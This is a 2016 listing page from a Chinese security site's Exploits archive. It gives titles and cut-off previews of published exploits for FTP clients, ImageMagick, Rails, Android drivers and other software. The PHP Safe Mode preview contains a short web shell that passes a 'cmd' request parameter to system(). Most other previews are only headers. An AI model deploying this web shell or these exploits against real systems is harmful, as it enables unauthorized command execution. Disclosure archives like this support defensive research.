首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Web interface for DNSmasq / Mikrotik - SQL Injection
  日期:2016-05-17 16:25:05 点击:42 评论:0
/* [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt [+] ISR: apparitionsec Vendor: ==================== tmcdos / sourceforge Product: ========
NRSS Reader 0.3.9 - Local Stack-Based Overflow
  日期:2016-05-17 16:24:21 点击:26 评论:0
# Exploit developed using Exploit Pack v5.4 # Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com # Program affected: NRSS RSS Reader # Version: 0.3.9-1 # # Tested and developed under: Kali Linux 2.0 x86 - https://www.kal
runAV mod_security - Arbitrary Command Execution
  日期:2016-05-17 16:23:38 点击:13 评论:0
# Title : runAV mod_security Remote Command Execution # Date : 13/05/2016 # Author : R-73eN # Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux # Software : https://github.
Android Broadcom Wi-Fi Driver - Memory Corruption
  日期:2016-05-17 16:20:48 点击:20 评论:0
/* * Copyright (C) 2016 by AbdSec Core Team ok@abdsec.com * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3
Microsoft Excel 2010 - Crash PoC
  日期:2016-05-17 16:20:48 点击:40 评论:0
Microsoft Office is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the affected application. ---------------------------------------------------------------------- Found : 11.05.2016 More: http://HauntIT
FTP JCL Execution
  日期:2016-05-17 16:19:42 点击:38 评论:0
require 'msf/core'require 'msf/core/exploit/tcp'class MetasploitModule Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info( info, 'Name' = 'FTP JCL
Linux Kernel bpf related UAF Vulnerability
  日期:2016-05-17 16:17:56 点击:35 评论:0
The following reproducer will cause a UAF of a previously allocated memory in bpf. You can reproduce with linux kernel master, or 4.6-rc6 4.6-rc7 and maybe other kernel versions. In the reproducer there is also a log of the UAF with KASAN of the ker
Core FTP Server 32-bit Build 587 - Heap Overflow
  日期:2016-05-11 14:42:01 点击:220 评论:0
# -*- coding: cp1252 -*- # Exploit Title: Core FTP Server 32-bit - Build 587 Heap Overflow # Date: 05/10/2016 # Exploit Author: Paul Purcell # Contact: ptpxploit at gmail # Vendor Homepage: http://www.coreftp.com/ # Vulnerable Version Download: http:
Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC
  日期:2016-05-11 14:41:29 点击:25 评论:0
#!/usr/bin/python #Author: Zahid Adeel #Author Email: exploiter.zee@gmail.com #Title: Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC #Vendor Homepage: http://www.wsftple.com/ #Software Link: http://www.wsftple.com/download.aspx #Version: LE
MediaInfo 0.7.61 - Crash PoC
  日期:2016-05-11 14:39:30 点击:29 评论:0
#!/usr/bin/perl -w # Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit # Tested on Windows 7 / Server 2008 # Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/ # # # Author : Mohammad
PHP 5.2.x Safe Mode Windows Bypass Vulnerability
  日期:2016-05-11 14:37:36 点击:33 评论:0
?php //Exploit Code system( 'dir' ); system( 'net user' ); print passthru ( 'ipconfig' ); exec ( 'whoami' , $a ); print_r( $a ); //Shell Script //shell.php?cmd=net user $cmd = '\' . $_GET [ 'cmd' ]; system( $cmd ); ?
Ruby on Rails Development Web Console (v2) Code Execution
  日期:2016-05-10 14:42:33 点击:58 评论:0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remo
ImageMagick Delegate Arbitrary Command Execution
  日期:2016-05-10 14:41:49 点击:50 评论:0
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule Msf::Exploit Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info
RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC
  日期:2016-05-10 14:40:54 点击:16 评论:0
#!/usr/bin/python # Exploit Title : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC # Discovery by : Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date : 08/05/2016 # Vendor Homepage : http://samspade.org # Software Link : http://www.mca
CIScan 1.00 - Hostname/IP Field Crash PoC Vulnerability
  日期:2016-05-10 14:39:01 点击:19 评论:0
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC # Discovery by : Irving Aguilar # Email : im.aguilar@protonmail.ch # Discovery Date : 05.05.2016 # Software Link : http://www.mcafee.com/us
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
  日期:2016-05-10 14:37:47 点击:303 评论:0
/* Source: http://rol.im/asux/ ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/ The ASUS Generic Function Service includes a couple of drivers, ASM
Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remot
  日期:2016-05-10 14:36:55 点击:82 评论:0
#!/usr/local/bin/python Dell SonicWall Scrutinizer = 11.0.1 setUserSkin/deleteTab SQL Injection Remote Code Execution sonic.py by mr_me@offensive-security.com greets to @brandonprry ;- Summary: ======== This exploits an pre-auth SQL Injection in the
i.FTP 2.21 - Host Address / URL Field SEH Exploit
  日期:2016-05-10 14:36:00 点击:18 评论:0
#!/usr/bin/python # Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit # Date: 3-5-2016 # Exploit Author: Tantaryu MING # Vendor Homepage: http://www.memecode.com/iftp.php # Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing
  日期:2016-05-06 18:18:48 点击:42 评论:0
!-- Exploit Title: Baidu Spark Browser URL spoof vulnerability Date:2016-05-02 Exploit Author: liu zhu Vendor Homepage:http://en.browser.baidu.com/ http://en.browser.baidu.com/Software Link:http://en.browser.baidu.com/query/fullpackage.exe?lang=en Ve
ImageMagick < 6.9.3-9 - Multiple Vulnerabilities
  日期:2016-05-06 17:10:53 点击:187 评论:0
Nikolay Ermishkin from the Mail.Ru Security Team discovered several vulnerabilities in ImageMagick. We've reported these issues to developers of ImageMagick and they made a fix for RCE in sources and released new version (6.9.3-9 released 2016-04-30
共637页/12733条记录 首页 上一页 [118] [119] [120] 121 [122] [123] [124] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved